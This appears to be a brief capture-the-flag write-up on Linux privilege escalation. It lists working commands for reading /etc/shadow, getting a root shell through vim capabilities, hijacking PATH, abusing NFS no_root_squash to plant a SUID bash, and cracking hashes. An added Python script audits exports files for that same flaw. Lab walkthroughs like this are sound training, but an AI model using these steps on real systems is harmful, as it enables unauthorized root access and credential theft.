Linux Privilege Escalation
January 08, 2024
Task 1
Task 2
Task 3
Task 4
Task 5

Task 6
sudo -l
sudo nmap --interactive

Task 7
base64 /etc/shadow | base64 --decode
base64 "/home/ubuntu/flag3.txt" | base64 --decode

Task 8
Use this command to list the capabilities that can be used to setuid
getcap -r / 2>/dev/null
./vim -c ':py3 import os; os.setuid(0); os.execl("/bin/sh", "sh", "-c", "reset; exec sh")'

Task 9 - Crontab
Change the content of the file that crontab runs



Get the password hash from /etc/shadow


Task 10
Find writable folders with this command
find / -writable 2>/dev/null | cut -d "/" -f 2,3 | grep -v proc | sort -u
Display the PATH to see the folders that hold executable files
echo $PATH
Make an executable file that has /bin/bash in it
cd /tmp
echo "/bin/bash" > thm
chmod 777 thm
export PATH=/tmp:$PATH
There is an executable ./test file that runs the thm command, which now resolves to /tmp/thm, the file that contains /bin/bash
This test file is a SUID file

Task 11
cat /etc/exports
From the attacker machine use this command
showmount -e 10.10.173.235
mkdir /tmp/attacker
sudo mount -o rw 10.10.166.100:/tmp /tmp/attacker
After mounting /tmp on the attacker machine, copy /bin/bash to /tmp from the victim machine
cd /tmp
cp /bin/bash bash
Then use these commands to change the owner of that file and make it SUID and executable
sudo chown root:root bash
sudo chmod +sx bash
Then just run the command
./bash -p
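
The Task 11 steps only work when the export leaves remote root unsquashed (the no_root_squash option in exports(5)), so a root-owned SUID file created from the client is honoured on the server. As an added example (not part of the original write-up), this Python audit parses exports(5) syntax and lists such exports; the sample file and all function names are constructed for illustration.

```python
import re

# Constructed sample in exports(5) syntax; not the target's real file.
SAMPLE = r"""
# path          client(options)
/tmp            *(rw,sync,insecure,no_root_squash,no_subtree_check)
/srv/backups    10.0.0.5(ro,no_root_squash) 10.0.0.6(rw)
/home           -rw,no_root_squash trusted.example(root_squash) \
                build.example
/srv/public     *(rw,all_squash)
"""

# -default,opts | host(opts) or (opts) | bare host
TOKEN = re.compile(r"(-\S+)|([^\s()]*)\(([^)]*)\)|(\S+)")
# Later options override earlier ones, so track each pair as one switch.
SWITCH = {"rw": ("write", True), "ro": ("write", False),
          "no_root_squash": ("root", True), "root_squash": ("root", False),
          "all_squash": ("all", True), "no_all_squash": ("all", False)}


def effective(options):
    """Resolve an option list against the exports(5) defaults (ro, root_squash)."""
    state = {"write": False, "root": False, "all": False}
    for opt in options:
        if opt in SWITCH:
            key, value = SWITCH[opt]
            state[key] = value
    return state


def audit_exports(text):
    """Return (path, client, writable) for each export where remote root stays root."""
    findings = []
    # A trailing backslash continues the line; '#' starts a comment.
    for raw in text.replace("\\\n", " ").splitlines():
        fields = raw.split("#", 1)[0].split(None, 1)
        if len(fields) < 2:
            continue  # blank line, or a path with no client list
        path, defaults = fields[0], []
        for dash, host, opts, bare in TOKEN.findall(fields[1]):
            if dash:  # "-opt,opt" sets defaults for the clients that follow
                defaults = dash[1:].split(",")
                continue
            state = effective(defaults + [o.strip() for o in opts.split(",")])
            if state["root"] and not state["all"]:
                findings.append((path, bare or host or "*", state["write"]))
    return findings


if __name__ == "__main__":
    for path, client, writable in audit_exports(SAMPLE):
        print(f"{path} -> {client}: root not squashed, {'rw' if writable else 'ro'}")
```

To check a real server, pass it the contents of /etc/exports; removing no_root_squash (root_squash is the default) and re-exporting with exportfs -ra fixes each finding.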
Task 12
First SSH in as the leonard user, then find the SUID binaries; after that, use base64
find / -perm -u=s -type f 2>/dev/null
base64 /etc/shadow | base64 -d
Get the password hash, then use john

Then SSH in to view flag1

After that use sudo -l to view the sudo commands that the user can use

We now own the box